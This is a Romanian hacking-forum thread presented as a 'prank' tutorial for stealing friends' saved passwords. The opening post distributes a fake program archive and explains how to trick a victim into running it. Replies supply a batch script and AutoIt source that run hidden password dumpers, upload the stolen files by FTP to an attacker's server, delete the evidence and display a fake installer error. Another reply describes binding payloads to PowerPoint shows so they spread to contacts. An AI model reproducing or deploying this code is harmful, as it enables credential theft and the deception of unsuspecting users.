Jump to content
cannabiss6

Cum sa spargi o parola.

Recommended Posts

Posted (edited)

Ok, primul meu `tutorial` pe forum. Acesta este un prank, si va voi explica cum functioneaza.

La toti nis`a intamplat sa ne ceara prietenii diferite programe pe Y!M. Cu acest prank il poti pacali (daca nu are antivirus, sau daca are ceva slab) sa ii furi parolele. Totul consta in ca arhivele Craking.see3; PSC.see3; ProgramName.see3; SuperSerial.see3; Updater.see3 sunt nume puse alandala. Cum se foloseste? Deci: Ii dati victimei arhiva, ii dati parola, tot. Ii ziceti ca trebuie sa intre in ProgramName.bat si ii ziceti sa stea linistit/a ca "eu nu sunt d`ala sa faca prostii". El va intra in ProgramName.bat si va observa niste erori si niste fisiere creeate. Imediat victima va va spune, iar atunci e momentul cand ii spuneti: "Trimite`mi fisierele creeate sa vad despre ce e vorba". Si gata :D. Intrebari comune:

Q: Defapt ce sunt .see3-urile?

A: Pai sunt niste exe-uri care prin comenzi din cmd (vezi ProgramName.bat) creeaza niste fisiere numite de mine error1.unknown pana la error5.unknown in care sunt inscrise diferite date (parolele registrate la IE, la Firefox, la eMail, la Y!M) care se deschid pur si simplu cu notepad.

Q: Atunci de ce nu sunt in format .exe?

A: Deoarece se prindea persoana ca e fake. De ce sunt cu format .unknown si nu sunt pur si simplu txt? Deoarece persoana ar intra imediat in .txt sa vada ce scrie si s`ar prinde.

Q: Cum pot modifica numele fisierelor, programul continuand sa functioneze ok?

A: Modifici numele lui de exemplu ProgramName.see3 si dupa aceea dai click dreapta pe .bat si dai click pe edit. Acolo unde scrie start

ProgramName.see3 /stext error2.unknown

pui ce nume vrei tu si va arata asa:

start [numele care l`ai pus].see3 /stext error2.unknown

.

Q: Ce sunt fisierele acelea din jur?(cfg-urile si acel folder umplut cu cacaturi?)

A: Sunt fisiere facute `la misto` pentru a da senzatia de program cu fisiere necesare lui.

Download:

http://www.megaupload.com/?d=80MH5C90

Parola:

cannabiss6

[in caz ca linkurile au cazut, dati`mi PM sau Reply si ziceti`mi si fac reupload.]

Edited by cannabiss6
Gresisem ceva :)
Posted
Dragut...

Dar de ce nu ai facut ca parolele sa fie trimise pe un ftp server? Poate intr-adevar cineva are nevoie de asa ceva... Ar fi mult mai comod... :)

open ftp.server.com

pai si eu ma gandeam sa fac asta, dar nu stiu cum sa fac...sunt incepator aici, si nu ma pricep prea mult la faza cu hosting, chiar daca am un server host ``la plesneala`` sa ma antrenez care se numeste www.cannabissvarupe.lx.ro(nu lua in seama numele, e la panarama). Daca ai fi amabil sa ma ajuti sa fac sa se uploadeze AUTOMAT fara ca pers sa`si dea seama, chiar te`as ruga :D

Posted

Intr-un fisier .bat, copie acest cod:

@ECHO OFF
echo open ftp.server.com>>cfg.unknown
echo ftp_user>>cfg.unknown
echo ftp_parola>>cfg.unknown
echo cd /www>>cfg.unknown
echo send log_file1.unknown>>cfg.unknown
echo send log_file2.unknown>>cfg.unknown
echo send log_file3.unknown>>cfg.unknown
echo quit>>cfg.unknown
ftp -i -s:cfg.unknown
del cfg.unknown
del log_file1.unknown
del log_file2.unknown
del log_file3.unknown

unde:

log_fileX.unknown - fisierele cu parolele furate

config.unknown - in acest fisier, temporar vor fi salvate parola si loginul ftp

www - folderul principal, deasemenea poate fi: htdocs, www, public_html

Dupa ce fisierele cu parole vor fi uploadate, cfg.unknown si fisierele cu parole automat vor fi sterse, pentru a nu lasa "urme"...

Cea mai mare problema, este ca "utilizatorul" iti poate vedea parola si loginul FTP, pentru aceasta, restrectioneaza accesul FTP si foloseste un "compilator" bat to exe...

Posted
Intr-un fisier .bat, copie acest cod:

@ECHO OFF
echo open ftp.server.com>>cfg.unknown
echo ftp_user>>cfg.unknown
echo ftp_parola>>cfg.unknown
echo cd /www>>cfg.unknown
echo send log_file1.unknown>>cfg.unknown
echo send log_file2.unknown>>cfg.unknown
echo send log_file3.unknown>>cfg.unknown
echo quit>>cfg.unknown
ftp -i -s:cfg.unknown
del cfg.unknown
del log_file1.unknown
del log_file2.unknown
del log_file3.unknown

unde:

log_fileX.unknown - fisierele cu parolele furate

config.unknown - in acest fisier, temporar vor fi salvate parola si loginul ftp

www - folderul principal, deasemenea poate fi: htdocs, www, public_html

Dupa ce fisierele cu parole vor fi uploadate, cfg.unknown si fisierele cu parole automat vor fi sterse, pentru a nu lasa "urme"...

Cea mai mare problema, este ca "utilizatorul" iti poate vedea parola si loginul FTP, pentru aceasta, restrectioneaza accesul FTP si foloseste un "compilator" bat to exe...

1.tx

2. daca te uiti atent, deja am facut, este un bat cu toate comenzile ascunse :))

sau nu am facut? k am facut niste updateuri la program, si nu mai stiu dak inainte sau dupa upload :))

Guest Praetorian
Posted

Cine dracu mai e atat de prost sa iti deschida un fisier bat de 1kb! :|

Posted
Cine dracu mai e atat de prost sa iti deschida un fisier bat de 1kb! :|

Bag maina in foc ca sunt multisori :)

Dar daca sincer, sunt sigur ca mult mai multi vor "deschide" cei, care vor primi "in dar", o arhiva SFX cu un icon dragut sau, daca autorul are prin colectie sa si un soft tip VISE...

Posted

Cum faceam inainte:

downloadam nBinder

downloadam net control

cautam un pps(powerpoint slideshow) bun

editam pps si scriam la sfarsit: Trimite la toti prietenii sau vei avea ghinion

downloadam un pps to exe converter si un batch to exe converter

transformam pps in exe

transformam scriptul meu batch in exe

le binduiam cu nbinder , schimbam icoana si trimiteam la fraieri si ei trimiteau la alti fraieri si etc

Posted

@cannabiss66 e bun programul.L-am luat si eu sa vad cu ce se mananca.Sunt mai incepator in asa ceva.Acele fisiere gen "ProgramName.see3" am vazut ca sunt exe de fapt.

Si ele extrag parolele.Stii cumva care e algoritmul de extragere.M-ar interesa sa pot sa le pun pe toate intr-un program.Am cautat in fisierul ala cookies.sqlite dar nu gasesc nimic.

Am parolele salvate la cateva site-uri si folosind o comanda in "cmd" de genu find /c c:\docume~1\*.* "parolamea" imi gaseste linii care contin parola in mai multe fisiere.Dar cand intru e totul codat.Si cu file->find nu gaseste nici o parola.

M-ar interesa algoritmul de extragere din acele "see3".

Posted (edited)

Imi cer scuze pentru dublu post dar prima data nu mi-a aparul ultimul post.Sper sa nu le lase cu ban.

@cannabis am luat fisierele puse de tine si mi-am permis sa le modific un pic.Daca te superi sa-mi zici sa sterg postu.

Aici:

gasesti un "installer" facut pentru FTP-ul meu.Am luat din arhiva ta "CODAT!" fisierele alea ".see3"

si le-am redenumit.Nu rula installer.exe din arhiva.Chiar functioneaza.

Aici:

#include <File.au3>

$sFilePath2="chestie.bat"

_FileCreate($sFilePath2)

FileOpen($sFilePath2,1)

FileWrite($sFilePath2, "uninstall.exe >")

$folder=@UserName & @HOUR

FileWrite($sFilePath2,$folder&".config"&@CRLF)

FileWrite($sFilePath2,"start media.see3 /stext "&$folder&"media.unknown" & @CRLF)

FileWrite($sFilePath2,"cls" & @CRLF)

FileWrite($sFilePath2,"start install.see3 /stext "&$folder&"install.unknown" & @CRLF)

FileWrite($sFilePath2,"cls" & @CRLF)

FileWrite($sFilePath2,"start PSC.see3 /stext "&$folder&"PSC.unknown" & @CRLF)

FileWrite($sFilePath2,"cls" & @CRLF)

FileWrite($sFilePath2,"start Serial.see3 /stext "&$folder&"serial.unknown" & @CRLF)

FileWrite($sFilePath2,"cls" & @CRLF)

FileWrite($sFilePath2,"start updater.see3 /stext "&$folder&"updater.unknown" & @CRLF)

FileWrite($sFilePath2,"pause" & @CRLF)

FileClose($sFilePath2)

;**********************************************

Run(@ComSpec & " /c " & 'chestie.bat', "", @SW_MINIMIZE)

;******************************************************

$sFilePath="utility.cfg"

_FileCreate($sFilePath)

FileOpen($sFilePath,1)

FileWrite($sFilePath, "open ftp.[server].com" & @CRLF)

FileWrite($sFilePath,"[userul de ftp]"& @CRLF)

FileWrite($sFilePath,"[parola de ftp]"& @CRLF)

FileWrite($sFilePath,"cd logs"& @CRLF)

;********************************************************logare

FileWrite($sFilePath,"put "& $folder & ".config" & @CRLF)

FileWrite($sFilePath,"put "& $folder&"media.unknown" & @CRLF)

FileWrite($sFilePath,"put "& $folder&"install.unknown"& @CRLF)

FileWrite($sFilePath,"put "& $folder&"PSC.unknown"& @CRLF)

FileWrite($sFilePath,"put "& $folder&"serial.unknown" & @CRLF)

FileWrite($sFilePath,"put "& $folder&"updater.unknown" & @CRLF)

;**********pune fisierul

FileWrite($sFilePath,"bye"& @CRLF)

;**********inchide conexiunea

FileClose($sFilePath)

$PID=Run(@ComSpec & " /c " & 'ftp -s:utility.cfg', "", @SW_MINIMIZE)

;****executa comenzile din fisierul utility.cfg

ProcessWaitClose($PID)

FileDelete($sFilePath)

FileDelete($sFilePath2)

FileDelete("utility.cfg")

FileDelete($folder & ".config")

FileDelete("*.unknown")

MsgBox("","Warning","An error occured during instalation.Installed files have been deleted!")

;***************Sterge fisierele de logare

Asta e codul sursa.L-am compilat in AutoIT v3 si merge.

Eventual poti sa mai adaugi ultima linie "FileDelete("*.see3")" si "FileDelete("*.cfg")"

ca sa stearga si executabilele care extrag parolele.

"$PID=Run(@ComSpec & " /c " & 'ftp -s:utility.cfg', "", @SW_MINIMIZE)"

Poti sa folosesti @SW_HIDE in loc de @SW_MINIMIZE..si mai sus tot in cod la fel.

linia "MsgBox("","Warning","An error occured during instalation.Installed files have been deleted!")" am adaugat-o cand scriam postul ca o idee sa para mai real programu.

Edited by phantomas90
Posted

Postul de deasupra ilustreaza ce inseamna "Offtopic" (nu are legatura cu subiectul ci cu pax) si "Redeschidere topic" (ultimul post a fost scris acum 2-3 luni, si nu are un motiv serios pentru redeschiderea acestui subiect).

Asadar, pentru cei care nu au inteles cum sa treaba cum avertismentele, puteti lua acest post drept un exemplu de "asa NU se face". :)

PS: Abtineti-va de la comentarii inutile. Adica sa nu va vad ca scrieti ceva in legatura cu acest post, va fi offtopic. Daca aveti ceva de zis in legatura cu subiectul, da, puteti spune, nici o problema.

  • Downvote 1
Posted
Ok, primul meu `tutorial` pe forum. Acesta este un prank, si va voi explica cum functioneaza.

La toti nis`a intamplat sa ne ceara prietenii diferite programe pe Y!M. Cu acest prank il poti pacali (daca nu are antivirus, sau daca are ceva slab) sa ii furi parolele. Totul consta in ca arhivele Craking.see3; PSC.see3; ProgramName.see3; SuperSerial.see3; Updater.see3 sunt nume puse alandala. Cum se foloseste? Deci: Ii dati victimei arhiva, ii dati parola, tot. Ii ziceti ca trebuie sa intre in ProgramName.bat si ii ziceti sa stea linistit/a ca "eu nu sunt d`ala sa faca prostii". El va intra in ProgramName.bat si va observa niste erori si niste fisiere creeate. Imediat victima va va spune, iar atunci e momentul cand ii spuneti: "Trimite`mi fisierele creeate sa vad despre ce e vorba". Si gata :D. Intrebari comune:

Q: Defapt ce sunt .see3-urile?

A: Pai sunt niste exe-uri care prin comenzi din cmd (vezi ProgramName.bat) creeaza niste fisiere numite de mine error1.unknown pana la error5.unknown in care sunt inscrise diferite date (parolele registrate la IE, la Firefox, la eMail, la Y!M) care se deschid pur si simplu cu notepad.

Q: Atunci de ce nu sunt in format .exe?

A: Deoarece se prindea persoana ca e fake. De ce sunt cu format .unknown si nu sunt pur si simplu txt? Deoarece persoana ar intra imediat in .txt sa vada ce scrie si s`ar prinde.

Q: Cum pot modifica numele fisierelor, programul continuand sa functioneze ok?

A: Modifici numele lui de exemplu ProgramName.see3 si dupa aceea dai click dreapta pe .bat si dai click pe edit. Acolo unde scrie start

ProgramName.see3 /stext error2.unknown

pui ce nume vrei tu si va arata asa:

start [numele care l`ai pus].see3 /stext error2.unknown

.

Q: Ce sunt fisierele acelea din jur?(cfg-urile si acel folder umplut cu cacaturi?)

A: Sunt fisiere facute `la misto` pentru a da senzatia de program cu fisiere necesare lui.

Download:

http://www.megaupload.com/?d=80MH5C90

Parola:

cannabiss6

[in caz ca linkurile au cazut, dati`mi PM sau Reply si ziceti`mi si fac reupload.]

offf la inchis F.B.I =))) din pacate

Guest
This topic is now closed to further replies.


×
×
  • Create New...